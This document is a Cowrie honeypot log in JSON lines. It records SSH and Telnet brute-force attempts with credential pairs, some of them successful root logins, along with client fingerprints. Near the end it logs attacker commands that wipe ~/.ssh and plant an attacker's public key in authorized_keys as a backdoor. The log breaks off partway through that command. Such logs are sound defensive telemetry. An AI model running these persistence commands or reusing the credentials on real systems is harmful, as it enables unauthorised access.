{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:55:44.853654Z","src_ip":"212.227.125.160","session":"c09af2856625"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:55:45.961239Z","src_ip":"212.227.125.160","session":"deaf0e63739f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:55:45.962440Z","src_ip":"212.227.125.160","session":"deaf0e63739f"}
{"eventid":"cowrie.login.success","username":"root","password":"235689741bosNYA","message":"login attempt [root/235689741bosNYA] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:55:46.300240Z","src_ip":"201.148.180.50","session":"96dd56929049"}
{"eventid":"cowrie.login.failed","username":"test3","password":"123456","message":"login attempt [test3/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:55:46.924162Z","src_ip":"212.227.125.160","session":"c09af2856625"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:55:48.361197Z","src_ip":"212.227.125.160","session":"c09af2856625"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:55:48.572297Z","src_ip":"201.148.180.50","session":"96dd56929049"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-31T05:55:48.573128Z","src_ip":"201.148.180.50","session":"96dd56929049"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:55:49.820278Z","src_ip":"201.148.180.50","session":"96dd56929049"}
{"eventid":"cowrie.session.closed","duration":"10.6","message":"Connection lost after 10.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:55:49.821435Z","src_ip":"201.148.180.50","session":"96dd56929049"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39014,"dst_ip":"1.2.3.4","dst_port":22,"session":"da414b622235","protocol":"ssh","message":"New connection: 212.227.235.229:39014 (1.2.3.4:22) [session: da414b622235]","sensor":"my-vps","timestamp":"2025-08-31T05:55:52.423882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:55:52.424956Z","src_ip":"212.227.235.229","session":"da414b622235"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50240,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc26b90c95bd","protocol":"ssh","message":"New connection: 212.227.235.229:50240 (1.2.3.4:22) [session: fc26b90c95bd]","sensor":"my-vps","timestamp":"2025-08-31T05:55:52.568626Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:55:52.569629Z","src_ip":"212.227.235.229","session":"fc26b90c95bd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:55:52.704162Z","src_ip":"212.227.235.229","session":"da414b622235"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:55:52.856021Z","src_ip":"212.227.235.229","session":"fc26b90c95bd"}
{"eventid":"cowrie.login.failed","username":"wesley","password":"wesley123","message":"login attempt [wesley/wesley123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:55:53.862627Z","src_ip":"212.227.235.229","session":"da414b622235"}
{"eventid":"cowrie.login.failed","username":"minikube","password":"minikube","message":"login attempt [minikube/minikube] failed","sensor":"my-vps","timestamp":"2025-08-31T05:55:54.039776Z","src_ip":"212.227.235.229","session":"fc26b90c95bd"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:55:55.144630Z","src_ip":"212.227.235.229","session":"da414b622235"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:55:55.326943Z","src_ip":"212.227.235.229","session":"fc26b90c95bd"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":52554,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa4e364c859b","protocol":"ssh","message":"New connection: 170.64.166.123:52554 (1.2.3.4:22) [session: aa4e364c859b]","sensor":"my-vps","timestamp":"2025-08-31T05:56:03.068709Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:56:03.070055Z","src_ip":"170.64.166.123","session":"aa4e364c859b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:56:03.345077Z","src_ip":"170.64.166.123","session":"aa4e364c859b"}
{"eventid":"cowrie.login.failed","username":"tempusr","password":"qwerty123456","message":"login attempt [tempusr/qwerty123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:56:04.487176Z","src_ip":"170.64.166.123","session":"aa4e364c859b"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:56:05.764194Z","src_ip":"170.64.166.123","session":"aa4e364c859b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33643,"dst_ip":"1.2.3.4","dst_port":23,"session":"ff09b5724db2","protocol":"telnet","message":"New connection: 212.227.235.229:33643 (1.2.3.4:23) [session: ff09b5724db2]","sensor":"my-vps","timestamp":"2025-08-31T05:56:06.155435Z"}
{"eventid":"cowrie.session.closed","duration":0.5492522716522217,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:56:06.704589Z","src_ip":"212.227.235.229","session":"ff09b5724db2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37717,"dst_ip":"1.2.3.4","dst_port":23,"session":"137ee4c8f27f","protocol":"telnet","message":"New connection: 212.227.235.229:37717 (1.2.3.4:23) [session: 137ee4c8f27f]","sensor":"my-vps","timestamp":"2025-08-31T05:56:06.855927Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-31T05:56:06.999378Z","src_ip":"212.227.125.160","session":"deaf0e63739f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51344,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3d29d7147e6","protocol":"ssh","message":"New connection: 212.227.235.229:51344 (1.2.3.4:22) [session: c3d29d7147e6]","sensor":"my-vps","timestamp":"2025-08-31T05:56:10.515371Z"}
{"eventid":"cowrie.session.closed","duration":"41.2","message":"Connection lost after 41.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:56:16.235466Z","src_ip":"212.227.125.160","session":"deaf0e63739f"}
{"eventid":"cowrie.session.closed","duration":10.286178827285767,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:56:17.142036Z","src_ip":"212.227.235.229","session":"137ee4c8f27f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60636,"dst_ip":"1.2.3.4","dst_port":22,"session":"00a0e946501e","protocol":"ssh","message":"New connection: 212.227.235.229:60636 (1.2.3.4:22) [session: 00a0e946501e]","sensor":"my-vps","timestamp":"2025-08-31T05:56:21.568307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:56:22.267932Z","src_ip":"212.227.235.229","session":"00a0e946501e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:56:22.268945Z","src_ip":"212.227.235.229","session":"00a0e946501e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:56:24.072077Z","src_ip":"212.227.235.229","session":"c3d29d7147e6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:56:24.072890Z","src_ip":"212.227.235.229","session":"c3d29d7147e6"}
{"eventid":"cowrie.login.failed","username":"test3","password":"12345","message":"login attempt [test3/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:56:28.435342Z","src_ip":"212.227.235.229","session":"00a0e946501e"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:56:30.180507Z","src_ip":"212.227.235.229","session":"00a0e946501e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50918,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3bacfc3d20e","protocol":"ssh","message":"New connection: 212.227.235.229:50918 (1.2.3.4:22) [session: b3bacfc3d20e]","sensor":"my-vps","timestamp":"2025-08-31T05:56:40.408163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:56:40.409864Z","src_ip":"212.227.235.229","session":"b3bacfc3d20e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:56:40.667373Z","src_ip":"212.227.235.229","session":"b3bacfc3d20e"}
{"eventid":"cowrie.login.success","username":"root","password":"Qaz112233","message":"login attempt [root/Qaz112233] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:56:41.693035Z","src_ip":"212.227.235.229","session":"b3bacfc3d20e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:56:42.636071Z","src_ip":"212.227.235.229","session":"b3bacfc3d20e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:56:42.636845Z","src_ip":"212.227.235.229","session":"b3bacfc3d20e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:56:42.637950Z","src_ip":"212.227.235.229","session":"b3bacfc3d20e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50464,"dst_ip":"1.2.3.4","dst_port":22,"session":"5faceeef746c","protocol":"ssh","message":"New connection: 212.227.125.160:50464 (1.2.3.4:22) [session: 5faceeef746c]","sensor":"my-vps","timestamp":"2025-08-31T05:56:42.639504Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:56:42.896534Z","src_ip":"212.227.235.229","session":"b3bacfc3d20e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:56:42.982888Z","src_ip":"212.227.125.160","session":"5faceeef746c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:56:42.983836Z","src_ip":"212.227.125.160","session":"5faceeef746c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:56:43.432359Z","src_ip":"212.227.235.229","session":"b3bacfc3d20e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa 